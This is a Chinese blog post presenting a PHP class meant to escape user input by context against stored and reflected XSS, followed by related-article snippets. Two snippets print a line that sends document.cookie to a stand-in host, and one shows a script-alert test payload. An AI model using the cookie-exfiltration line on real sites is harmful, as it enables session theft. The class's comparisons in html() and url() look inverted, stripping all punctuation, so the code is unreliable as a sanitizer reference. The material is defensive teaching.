PHP防御防御永久型和反射XSS

最新推荐文章于 2024-04-09 17:27:09 发布
最新推荐文章于 2024-04-09 17:27:09 发布
阅读量572 收藏
点赞数
分类专栏: PHP 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/killapper/article/details/46304211
版权
安全 同时被 3 个专栏收录
11 篇文章 0 订阅
订阅专栏
web安全
4 篇文章 0 订阅
订阅专栏
PHP
2 篇文章 0 订阅
订阅专栏

本代码只用于防御永久型和反射型XSS 攻击,有更好的意见请留言,thank you !!

<?php
class Safe {
	function basic($c)
	{
		$ord = ord($c);
		if($this->isnumber($ord))
		{
			if(mb_check_encoding($c,"UTF-8"))
			{
				return $c;
			}
			return $c;
		}
		if($this->isalphabet($ord))
		{
			return $c;
		}
		return "";
	}
	function basics($s)
	{
		$str = "";
		for($i = 0;$i < mb_strlen($s);$i++)
		{
			$str .= $this->basic(mb_substr($s,$i,1));
		}
		return $str;
	}
	function basic_arr($arr)
	{
		foreach($arr as $k => $v)
		{
			$arr[$k] = $this->basics($v);
		}
		return $arr;
	}
	function css($c)
	{
		$ord = ord($c);
		$hex = bin2hex($c);
		if(strlen($c) > 1)
		{
			if(mb_check_encoding($c,"UTF-8"))
			{
				return $c;
			}
			return "\\".$hex." ";
		}
		if($this->isnumber($ord))
		{
			return $c;
		}
		if($this->isalphabet($ord))
		{
			return $c;
		}
		return "\\".$hex." ";
	}
	function csss($css)
	{
		$str = "";
		for($i = 0;$i < mb_strlen($css);$i++)
		{
			$str .= $this->css(mb_substr($css,$i,1));
		}
		return $str;
	}
	function javascript($c)
	{
		$ord = ord($c);
		$hex = bin2hex($c);
		if(strlen($c) > 1)
		{
			if(mb_check_encoding($c,"UTF-8"))
			{
				return $c;
			}
			return "\\u".str_pad($hex,4,"0");
		}
		if($this->isnumber($ord))
		{
			return $c;
		}
		if($this->isalphabet($ord))
		{
			return $c;
		}
		return "\\x".str_pad($hex,2,"0");
	}
	function javascripts($js)
	{
		$str = "";
		for($i = 0;$i < mb_strlen($js);$i++)
		{
			$str .= $this->javascript(mb_substr($js,$i,1));
		}
		return $str;
	}
	function html($c)
	{
		$ord = ord($c);
		$hex = bin2hex($c);
		if(strlen($c) > 1)
		{
			if(mb_check_encoding($c,"UTF-8"))
			{
				return $c;
			}
			return "&#x".$hex.";";
		}
		if($this->isnumber($ord))
		{
			return $c;
		}
		if($this->isalphabet($ord))
		{
			return $c;
		}
		if(($ord >= 0x1f && $ord != 0x09 && $ord != 0x0a && $ord != 0x0d) || ($ord >= 0x7f && $ord <=0x9f))
		{
			return "";
		}
		return "&#x".$hex.";";
	}
	function htmls($html)
	{
		$str = "";
		for($i = 0;$i < mb_strlen($html);$i++)
		{
			$str .= $this->html(mb_substr($html,$i,1));
		}
		return $str;
	}
	function url($c)
	{
		$ord = ord($c);
		if(strlen($c) > 1)
		{
			return urlencode($c);
		}
		if($this->isnumber($ord))
		{
			return $c;
		}
		if($this->isalphabet($ord))
		{
			return $c;
		}
		//$allow = array(":","/",".","?","%","&","=","-");
		$allow = array(58,47,46,63,37,38,61,95,45);
		if(in_array($ord,$allow,true))
		{
			return $c;
		}
		if($ord >= 0x1f || $ord >= 0x7f && $ord <= 0x9f)
		{
			return "";
		}
		return urlencode($c);
	}
	function urls($url)
	{
		$str = "";
		for($i = 0;$i < mb_strlen($url);$i++)
		{
			$str .= $this->url(mb_substr($url,$i,1));
		}
		return $str;
	}
	
	function isnumber($ord)
	{
		if($ord >= 48 && $ord <= 57)
		{
			return true;
		}
		return false;
	}
	function isupper($ord)
	{
		if($ord >= 65 && $ord <= 90)
		{
			return true;
		}
		return false;
	}
	function islower($ord)
	{
		if($ord >= 97 && $ord <= 122)
		{
			return true;
		}
		return false;
	}
	function isalphabet($ord)
	{
		return $this->isupper($ord) || $this->islower($ord);
	}
}


killapper
关注
专栏目录
web漏洞——XSS攻击原理及防御
weixin_43806577的博客
08-28 767
XSS漏洞介绍 跨站脚本(Cross-Site Script,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。 XSS漏洞危害: 挂马 盗取用户cookie DOS(拒绝服务)客户端浏览器 钓鱼攻击,高级钓鱼技巧 编写针对性的XSS病毒,删除目标文章,恶意篡改数据,...
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
最新发布
zz12345600354的博客
04-23 1120
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
php反射xss,【DVWA(四)】XXS反射跨站攻击
weixin_39805539的博客
04-01 327
XXS反射跨站攻击(Reflected Cross Site Scripting)概要:跨站攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cooki...
php+防御+xss,PHP防御XSS攻击
weixin_39777464的博客
04-04 170
XSS即跨站脚本工具例如我在你的评论上写了alert('楼主傻逼');然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下document.location="http://www.test.com/a.php?b="+document.cookie;通过这种方式,你的所有cookie就会被发送到对应的网站去,然后你就呵呵了~~~~所以我们应该要过滤掉...
php防止xss攻击
u013695932的博客
05-09 317
<?PHP function clean_xss(&$string, $low = False) { if (!is_array($string)) { $string = trim($string); $string = strip_tags($string); $string = htmlspecialchars($string); if ($low) { return True; ...
PHP防止xss攻击
yang_ldgd的博客
08-16 621
phpxss攻击
PHP 防止xss攻击
infinite
01-20 539
一、什么是xss攻击?   XSS攻击全称跨站脚本攻击,是为不合层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。    XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中...
web安全之XSS攻击及防御pdf
08-25
反射XSS漏洞的挖掘主要集中在输入框和URL参数上。可以通过尝试在输入框中插入特殊的字符序列,如`<script>alert("XSS!");</script>`,并提交,观察服务器是否原样返回,如果没有经过适当的过滤,则可能存在XSS漏洞...
XSS攻击及防御总结和各平台通关思路
qq_43710889的博客
08-05 3558
XSS原理 跨站脚本攻击XSS(cross site scripting)。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采用cookie窃取、会话劫持、钓鱼欺骗等各种攻击。 漏洞存在的主要原因: 参数输入未经过安全过滤 恶意脚本被输出到网页 用户的浏览器执行了恶意脚本 XSS漏洞分类 1.反射XSS 也称非持久、参数跨站脚本。主要用于恶意脚本附加在URL地址的参数中。他需要欺骗
XSS存储 网易云课堂
01-18
XSS存储XSS攻击的一种类,与反射和DOMXSS不同,它主要涉及用户提交的数据被永久性地存储在服务器端,并在后续请求中被其他用户读取和执行。 在“网易云课堂微专业-WEB安全工程师”课程中,深入探讨了这种...
PHP攻击防御
bravezhe的专栏
01-12 1906
如何对PHP程序中的常见漏洞进行攻击(上)  创建时间:2001-07-17  文章属性:翻译  文章来源:httpwww.china4lert.org  文章提交:analysist (analysist_at_china.com)  如何对PHP程序中的常见漏洞进行攻击(上)  原著:Shaun Clowes httpwww.securereality.co
php反射xss,反射XSS测试及修复
weixin_28744613的博客
04-01 1404
反射XSS一般出现的位置,如GET参数中测试搜索功能F12查看源码,查找出现1111的位置第一个位置在title处尝试闭合掉title标签,然后测试JS代码,成功弹窗查看源码,XSS执行第二处位置在搜索框,此处XSS无法执行,因为位于value属性内,需要将其闭合测试时注意闭合掉多余的双引号”接下来对XSS漏洞进行源码修复第一处XSS在title位置,输入的搜索参数ks直接echo输出,没有进行...
php如何防止xss攻击
XJ58678的博客
08-05 355
php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。 在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。 所以使用htmlspecialchar函数时尽量加上第二个参数,htm...
PHP网站被挂马防御
ve12345的博客
06-03 534
最近把几个PHP网站的程序备份到本地,准备与本地的发布版的svn做内容整合。发现有一些non-versioned的程序文件,仔细查看,是一些木马程序。 我在本地测试了这些木马程序,可以读取所有硬盘的文件,可以随意修改文件,下载任意硬盘位置的文件,上传文件到主机任意硬盘位置,可以说接近在主机上管理文件了,更糟糕的是还可以执行本地程序或命令,管理mysql等等 它怎么隐藏和伪装的? 它一般藏的目...
PHP防御XSS攻击
Lisam Blog
12-15 2460
XSS即跨站脚本工具 例如我在你的评论上写了 alert('楼主傻逼'); 然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下 document.location="http://www.test.com/a.php?b="+document.cookie; 通过这种方式,你的所有cookie就会被发送到对应的网站去
xss防御php利用httponly防xss攻击
zhangdaohong的博客
09-25 635
https://www.jb51.net/article/48345.htm xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息:   复制代码 代码如下: url=d...
php代码审计【6】反射xss
司徒荆的博客
06-20 561
反射xss
PHP跨站脚本攻击(XSS)防范方案
m0_66326520的博客
04-09 1326
反射XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击。攻击负载和脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。存储 XSS 攻击指的是攻击者将恶意脚本提交到受害网站的数据库中,当其他用户浏览包含该恶意脚本链接的页面时,就会执行该脚本,从而导致攻击者的目的得以实现。由于是将恶意脚本保存在数据库中,所有访问包含恶意代码的页面的用户都受到攻击。而且这种攻击方式难解决。
PHP 安全防护手段
Owen的博客
08-10 367
一 代码层 1.黑名单 : 不允许 mysql 关键字:select insert update delete等..... 2.白名单 : 允许通过的字符 3.敏感字符过滤 单引号 双引号等... 3.1 HTML Purifier 作用:防止XSS攻击。 http://htmlpurifier.org/ 4.使用框架安全操作: CI的AR(Active Record)的数据库CURD方式 esca...
XSS攻击与防御全面指南
这篇文档是关于XSS(跨站脚本)攻击和防御的详细指南,由Xylitol撰写,主要涵盖了XSS的基础知识,攻击构造,防御策略以及各种攻击技巧。XSS是一种常见的网络安全问题,它利用了网站对用户输入验证不足的漏洞,允许...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值